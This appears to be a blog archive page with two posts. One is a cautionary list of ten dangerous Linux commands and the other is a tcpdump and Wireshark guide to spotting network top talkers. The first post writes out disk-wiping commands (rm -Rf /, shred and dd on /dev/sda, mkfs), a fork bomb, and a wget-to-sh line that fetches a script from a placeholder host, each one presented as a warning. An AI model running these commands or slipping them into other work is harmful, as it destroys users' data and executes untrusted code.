10 most dangerous linux commands you should never run

admin — Fri, 16 Jun 2017 19:36:50 +0000

10 most dangerous linux commands you should never run

There are many commands that can irreversibly damage your system. Some are less cryptic than others, some look like plain gibberish. Here is a list of dangerous commands on Linux, some permanent and some that can be recovered from.

Irreversible Linux Commands – The Most Dangerous Ones

rm -Rf /

This command has gained a lot of notoriety, and is particularly dangerous. Thankfully, many UNIX systems have placed a safeguard into the rm command to ensure that it doesn’t happen accidentally or unintentionally. It might be confusing to think that something so destructive could be run accidentally, but it’s really as simple as using an uninitialized variable in a BASH script and not checking it before running the command.

shred /dev/sda

Shred is a particularly dangerous command, unlike in the case of rm where anyone with some data recovery knowledge can data-carve the volume for any important files, shred does just as the name suggests. Shred feeds off of the operating systems /dev/random or /dev/urandom to generate random information. This information is then used to overwrite the drive in several passes rendering the data irretrievable. Even if you manage to interrupt the process before it gets through too much of your data, you’ll still have to rebuild your partition table and repair any filesystems that may have been touched. Shred is certainly a dangerous command if not used carefully.

dd if=/dev/random of=/dev/sda

dd is an amazingly useful tool. It can be used for making clones of volumes, filesystems, writing images to disks, and even erasing drives.The above dd command accomplishes something that is about the same as shred, with the only differences being that shred is much faster and does multiple passes by default.

mkfs.ext4 /dev/sda1

As Picasso said, “every act of creation is first an act of destruction,” and the same is true with mkfs. The fault here doesn’t lie with ext4 particularly, only that in order to create a new filesystem you must discard all existing data on the volume. This obviously isn’t a trouble on a shiny new disk, but it can bring a running system to its knees if it’s used without discretion.

mv / /dev/null

This one is on par with our first. Anything written to /dev/null will write successfully. This means that this command is effectively the same as our first, although it might take longer to accomplish.

Dangerous, Although Reversible Linux Commands

:(){:|:&};:

This cryptic string is BASH wizardry at it’s most evil and arcane. It’s known by the common name of the BASH Fork Bomb. Its other names are Rabbit Virus or Wabbit. Its construction is elegant and deadly, bringing any system to halt if the proper security measures aren’t put in place. The command simply creates a function named : with the :() in the beginning, it then goes on to define the contents of the function with {:|:&}, this again is very simple as it only executes itself and pipes into another call of itself while backgrounding the process. Finally, the function definition is terminated with the ; and called with the :. To defend against this type of attack you need to implements precautions in the /etc/security/limits.conf configuration file.

wget http://unknownsource.com/possiblydangerous.sh -O- | sh

This one should be a no-brainer. While wget is a useful tool, anything you download, especially executables, should be inspected if they come from an unknown or untrusted source. This command downloads the script and pipes it into sh which is usually just a symbolic link to BASH. So, anything in the script will be executed provided the user has sufficient privilege. The contents of the script would quite possibly be any of the previously mentioned commands.

gunzip untrusted.gz

The seldom known Decompression Bomb is pretty unique in its approach. Compression relies on order in information to compress at higher ratios, considering that, a file filled with ones or zeros would be able to be compressed to a very high ratio, the resulting file could be orders smaller than the original. And that’s exactly what the Decompression Bomb is. It is a file that when decompressed will fill the disk space. On a Linux machine, this can be fatal to many system services that require logging or writing to a file. For that reason, decompressing any untrusted file can be very dangerous.

command > file.conf

The redirection feature of BASH is extremely useful, but when it’s used without care, it can end up wiping out an important configuration file. Remembering to distinguish between > and >>, or replace and append, can be difficult to the beginner. It’s even common for professionals to overlook it and lose files. That’s why you should always double check, or even triple check, the commands you run.

^mistake^correction

This is a substitution to correct a mistake made in the previous command. It’s not something to keep at the top of your toolbox, but it’s something particularly handy when running long commands. The danger here comes from the fact that it can substitute malicious content into previously run commands, so it’s especially important to be diligent in inspecting both the previous command and the substitution.

Surely, there are many more commands that can disrupt or permanently impair a system. Did we miss any big ones? Do you know of any obscure ones? Let us know in the comments below.

source: https://fossbytes.com

The post 10 most dangerous linux commands you should never run appeared first on ITBlogSec.com.

How to find out TOP talkers in your network

admin — Fri, 30 Dec 2016 22:44:59 +0000

How to find out TOP talkers in your network

Sometimes it is very useful to find out current top talkers in your network, affecting your local interface. You can figure out what it’s going on and what IP can be possible source of congestion.

UNIX/LINUX procedure

Issue following command, by parameter -c you can configure amount of packets what will be captured, by parameter -i specify interface you want to sniff on:

sudo tcpdump -tnn -c 40 -i eth0  | awk -F "." '{print $1"."$2"."$3"."$4}' | sort | uniq -c | sort -nr | head

Output of analyzing 40 packets

WINDOWS procedure

In Windows OS we will use well-known application Wireshark. Normally a network interface will only “receive” packets directly addressed to the interface. Promiscuous mode allows the interface to receive all packets that it sees whether they are addressed to the interface or not. By enabling interface in promiscuous mode you can easily sniff traffic and based on further analyse you can figure out who is possible top-talker. It is very useful in case you are experiencing some kind of broadcast (multicast) storm and want to identify source of your congestion.

Selection of interface and starting packets capture

1. Click button to open capture interface settings
2. Select interface which you want to capture traffic on
3. Click “Start” button to start capturing

Stopping capture and selecting Conversations

4. After a few seconds you can “Stop” capturing of traffic
5. Select “Statistics”
6. Choose “Conversations”

Conversations dialog where you can filter and see full statistics of captured packets

Simply by selecting desired port, ordering based on “Bytes” you can see souce/destination IP which is originating the most packets. Do not forget that you will not be able to see all traffic in your network but you can capture traffic which does not have to be addressed directly to your interface but can influence also your network performance (e.g. broadcast storm …).

The post How to find out TOP talkers in your network appeared first on ITBlogSec.com.

unix Archives - ITBlogSec.com

10 most dangerous linux commands you should never run